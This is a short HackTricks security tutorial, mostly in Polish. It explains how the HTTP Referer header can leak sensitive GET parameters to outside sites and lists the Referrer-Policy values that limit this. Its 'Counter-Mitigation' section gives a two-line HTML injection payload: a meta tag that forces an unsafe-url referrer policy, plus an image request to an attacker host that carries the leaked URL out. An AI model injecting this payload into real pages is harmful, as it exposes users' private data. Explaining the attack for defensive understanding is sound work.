Interesting HTTP

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Nagłówki i polityka referencji

Referer to nagłówek używany przez przeglądarki do wskazania, która strona była wcześniej odwiedzana.

Wyciek wrażliwych informacji

Jeśli w pewnym momencie na stronie internetowej jakiekolwiek wrażliwe informacje znajdują się w parametrach żądania GET, jeśli strona zawiera linki do zewnętrznych źródeł lub atakujący jest w stanie nakłonić (inżynieria społeczna) użytkownika do odwiedzenia adresu URL kontrolowanego przez atakującego, może być w stanie wyekstrahować wrażliwe informacje z ostatniego żądania GET.

Łagodzenie

Możesz sprawić, że przeglądarka będzie przestrzegać polityki referencji, która mogłaby zapobiec wysyłaniu wrażliwych informacji do innych aplikacji internetowych:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Counter-Mitigation

Możesz nadpisać tę regułę, używając tagu meta HTML (atakujący musi wykorzystać i wstrzyknięcie HTML):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Obrona

Nigdy nie umieszczaj żadnych wrażliwych danych w parametrach GET lub ścieżkach w URL-u.

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.

PreviousOther Web Tricks NextAndroid Forensics

Last updated 4 days ago